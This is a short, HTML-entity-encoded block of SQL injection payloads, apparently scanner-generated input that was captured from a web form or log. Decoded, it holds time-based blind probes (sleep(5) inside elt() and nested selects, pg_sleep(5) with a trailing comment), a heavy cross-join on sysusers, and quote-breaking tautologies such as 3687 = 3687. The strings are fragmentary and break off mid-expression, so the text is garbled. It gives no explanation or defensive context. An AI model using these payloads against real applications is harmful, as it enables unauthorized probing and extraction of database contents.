&#49;&#39;&#124;&#124;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#39;&#105;&#117;&#117;&#100;&#39;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#51;&#54;&#56;&#55;&#32;&#61;&#32;&#51;&#54;&#56;&#55;
&#34;&#49;&#34;&#34;&#32;&#41;&#32;&#32;&#97;&#115;&#32;&#110;&#114;&#97;&#119;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#55;&#57;&#56;&#52;&#32;&#61;&#32;&#55;&#57;&#56;&#52;&#32;&#97;&#110;&#100;&#32;&#101;&#108;&#116;&#32;&#40;&#32;&#51;&#49;&#49;&#52;&#32;&#61;&#32;&#51;&#49;&#49;&#52;&#44;&#115;&#108;&#101;&#101;&#112;&#32;&#40;&#32;&#53;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#35;&#34;
&#34;&#49;&#34;&#34;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#41;&#32;&#32;&#97;&#110;&#100;&#32;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#42;&#32;&#102;&#114;&#111;&#109;&#32;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#40;&#32;&#115;&#108;&#101;&#101;&#112;&#32;&#40;&#32;&#53;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#41;&#32;&#102;&#122;&#110;&#111;&#32;&#41;&#32;&#32;&#97;&#110;&#100;&#32;&#32;&#32;&#40;&#32;&#32;&#40;&#32;&#32;&#32;&#40;&#32;&#34;&#34;&#117;&#110;&#99;&#103;&#34;&#34;&#32;&#61;&#32;&#34;&#34;&#117;&#110;&#99;&#103;&#34;
&#34;&#49;&#37;&#34;&#34;&#32;&#97;&#110;&#100;&#32;&#55;&#53;&#51;&#51;&#32;&#61;&#32;&#55;&#53;&#51;&#51;&#32;&#97;&#110;&#100;&#32;&#34;&#34;&#37;&#34;&#34;&#32;&#61;&#32;&#34;&#34;&#34;
&#49;&#32;&#119;&#104;&#101;&#114;&#101;&#32;&#55;&#48;&#50;&#49;&#32;&#61;&#32;&#55;&#48;&#50;&#49;&#32;&#111;&#114;&#32;&#54;&#55;&#57;&#51;&#32;&#61;&#32;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#54;&#55;&#57;&#51;&#32;&#102;&#114;&#111;&#109;&#32;&#112;&#103;&#95;&#115;&#108;&#101;&#101;&#112;&#32;&#40;&#32;&#53;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#45;&#45;
&#45;&#56;&#48;&#56;&#48;&#39;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#111;&#114;&#100;&#101;&#114;&#32;&#98;&#121;&#32;&#49;&#35;
&#34;&#49;&#39;&#32;&#32;&#41;&#32;&#32;&#41;&#32;&#32;&#32;&#41;&#32;&#32;&#111;&#114;&#32;&#52;&#52;&#49;&#49;&#32;&#61;&#32;&#32;&#40;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#99;&#111;&#117;&#110;&#116;&#32;&#40;&#32;&#42;&#32;&#41;&#32;&#32;&#102;&#114;&#111;&#109;&#32;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#49;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#50;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#51;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#52;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#53;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#54;&#44;&#115;&#121;&#115;&#117;&#115;&#101;&#114;&#115;&#32;&#97;&#115;&#32;&#115;&#121;&#115;&#55;&#32;&#41;&#32;&#32;&#97;&#110;&#100;&#32;&#32;&#32;&#40;&#32;&#32;&#40;&#32;&#32;&#32;&#40;&#32;&#39;&#110;&#97;&#114;&#110;&#39;&#32;&#61;&#32;&#39;&#110;&#97;&#114;&#110;&#34;
